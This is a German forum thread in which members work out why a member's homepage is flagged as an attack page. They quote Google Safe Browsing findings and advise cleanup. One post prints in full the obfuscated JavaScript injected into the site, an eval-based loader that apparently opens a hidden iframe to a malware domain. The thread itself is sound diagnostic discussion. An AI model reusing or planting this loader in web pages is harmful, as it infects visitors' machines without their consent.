![[Bild: unbenannt80kyi.jpg]](http://www.abload.de/thumb/unbenannt80kyi.jpg)
Entweder es hat wer etwas verlinkt oder bei mir stimmt irgendwas nicht..
Cebion schrieb:
Entweder es hat wer etwas verlinkt oder bei mir stimmt irgendwas nicht..
Liegt sicher an deinem Browser.. mit FireFox ist alles gut.
In Opera hab ich auch keine Probleme.
Hat sich erübrigt, lag an einem Link der hier gepostet wurde.
Cebion schrieb:Hat sich erübrigt, lag an einem Link der hier gepostet wurde.
Aber sicher nicht an meiner Homepage!
Ich habe auch kein Problem. Ich benutze IE 9. Komisch.....
ach Google war bei sowas eh noch nie zuverlässig...
Gadler schrieb:Cebion schrieb:Hat sich erübrigt, lag an einem Link der hier gepostet wurde.
Aber sicher nicht an meiner Homepage!
wird für mich aber auch geblockt. Ich weiß nicht wie das läuft, aber möglicherweise hat jemand deine HP gemeldet oder so?!?
Zitat:Reported Attack Page!
This web page at http://www.second-unit.org has been reported as an attack page and has been blocked based on your security preferences.
Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
edit:
Zitat:Safe Browsing
Diagnostic page for second-unit.org
What is the current listing status for second-unit.org?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-04-08, and the last time suspicious content was found on this site was on 2012-04-08.
Malicious software includes 2 exploit(s), 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 6 new process(es) on the target machine.
Malicious software is hosted on 1 domain(s), including domain4jimmy.com/.
This site was hosted on 1 network(s) including AS8560 (SCHLUND).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, second-unit.org did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Habe es auch mal getestet.. vorher habe ich es wohl nicht verstanden was der TE meinte. Wird auch im FireFox geblockt
Gadler will uns also ausspionieren. Alles was im Titel steht Facebookfrei usw. ist also nur ein Trick *paranoia aus
Kleiner Scherz
Wassn da also los?
Avast meldet Javaexploit. Ich würde mal sagen deine Seite wurde gehackt und Code injiziert. Schaue ich mir den HTML Code an kommt mir das verdächtig vor:
Code:
<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Date().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i60i71i69i57i65i70i12i66i65i69i69i81i6i59i71i69i7i69i57i65i70i6i72i64i72i23i72i57i63i61i21i62i17i13i8i58i13i58i10i8i57i14i16i15i8i15i8i-1i-8i79i65i60i76i64i21i-1i9i8i-1i-8i64i61i65i63i64i76i21i-1i9i8i-1i-8i75i76i81i68i61i21i-1i78i65i75i65i58i65i68i65i76i81i18i64i65i60i60i61i70i19i72i71i75i65i76i65i71i70i18i57i58i75i71i68i77i76i61i19i68i61i62i76i18i8i19i76i71i72i18i8i19i-1i22i20i7i65i62i74i57i69i61i22i-6i1i19i-27i-31i-31i85i-27i-31i-31i62i77i70i59i76i65i71i70i-8i65i62i74i57i69i61i74i0i1i83i-27i-31i-31i-31i78i57i74i-8i62i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i75i74i59i-1i4i-1i64i76i76i72i18i7i7i60i71i69i57i65i70i12i66i65i69i69i81i6i59i71i69i7i69i57i65i70i6i72i64i72i23i72i57i63i61i21i62i17i13i8i58i13i58i10i8i57i14i16i15i8i15i8i-1i1i19i62i6i75i76i81i68i61i6i78i65i75i65i58i65i68i65i76i81i21i-1i64i65i60i60i61i70i-1i19i62i6i75i76i81i68i61i6i72i71i75i65i76i65i71i70i21i-1i57i58i75i71i68i77i76i61i-1i19i62i6i75i76i81i68i61i6i68i61i62i76i21i-1i8i-1i19i62i6i75i76i81i68i61i6i76i71i72i21i-1i8i-1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i79i65i60i76i64i-1i4i-1i9i8i-1i1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i64i61i65i63i64i76i-1i4i-1i9i8i-1i1i19i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i6i57i72i72i61i70i60i27i64i65i68i60i0i62i1i19i-27i-31i-31i85'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;617!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);</script>
Allerdings kenne ich mich mir dem ganzen Webkram wenig aus. Ich würde mal ein altes Backup der Seite aufspielen und alle Passwörter ändern.
Ja, dass ist Malware.
http://jsunpack.jeek.org/dec/go? zum Java decodieren.
Taucht in letzer Zeit immer häufiger auf. Glaube das geht in diesem Fall übrigens auf domain4jimmy.com zurück. Der Hoster nehme ich an.
legen schrieb:Der Hoster nehme ich an.
Hoster ist 1und1. Die Seite dämmert nur noch vor sich hin. Bin nur zu faul, sie zu kündigen
Ist aber auch nur
GoogleSafeBrowsing, der "was findet".
Ich würde den injizierten Code rausnehmen...
Gadler schrieb:Ist aber auch nur GoogleSafeBrowsing, der "was findet".
Nein, den Malewarecode habe ich ja oben gepostet, den habe ich aus dem HTML Code deiner Seite kopiert. Es ist definitiv Code in deine Seite injiziert worden.
Wie gesagt, Avast springt auch gleich an, wenn ich auf die Seite gehe.
![[Bild: unbenannt80kyi.jpg]](http://www.abload.de/image.php?img=unbenannt80kyi.jpg)